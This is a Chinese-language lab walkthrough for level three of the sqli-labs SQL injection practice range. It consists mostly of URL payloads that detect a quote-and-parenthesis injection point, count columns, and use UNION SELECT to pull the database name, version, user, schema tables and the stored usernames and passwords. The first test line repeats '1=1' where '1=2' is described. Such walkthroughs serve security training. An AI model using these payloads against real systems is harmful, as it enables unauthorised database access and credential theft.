SQL注入sqli_labs靶场第三题

?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

根据报错信息判断为单引号带括号注入

联合查询:

猜解列名

?id=1') order by 3--+

判断回显点

?id=-1') union select 1,2,3--+

爆库、版本号、权限

?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+

爆表、爆列

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1') union select 1,2,(select group_concat(username,password))from users

相关推荐
l1t10 小时前
利用DeepSeek改写并增强测试Duckdb和sqlite的不同插入方法性能
python·sql·sqlite·duckdb
Asu520210 小时前
思途AOP学习笔记 0806
java·sql·学习·mybatis
fenglllle14 小时前
项目中MySQL遇到的索引失效的问题
数据库·mysql
会飞的灰大狼16 小时前
MySQL主从复制部署
linux·mysql·ubuntu·centos7
余辉zmh16 小时前
【MySQL基础篇】:MySQL常用内置函数以及实用示例
android·mysql·adb
三天不学习17 小时前
MySQL JSON 数据类型用法及与传统JSON字符串的对比 JSON数据类型简介
mysql·json
倾听醉梦语18 小时前
Redis作为MySQL缓存的完整指南:从原理到实战
数据库·redis·mysql·缓存
_代号00719 小时前
MySQL梳理:其他
mysql
秋难降20 小时前
零基础学习SQL(二)-------关系型数据库数据操纵语言(DML)
大数据·数据库·mysql
月夜奇术师20 小时前
视图 vs 直接使用复杂SQL:深入比较
数据库·sql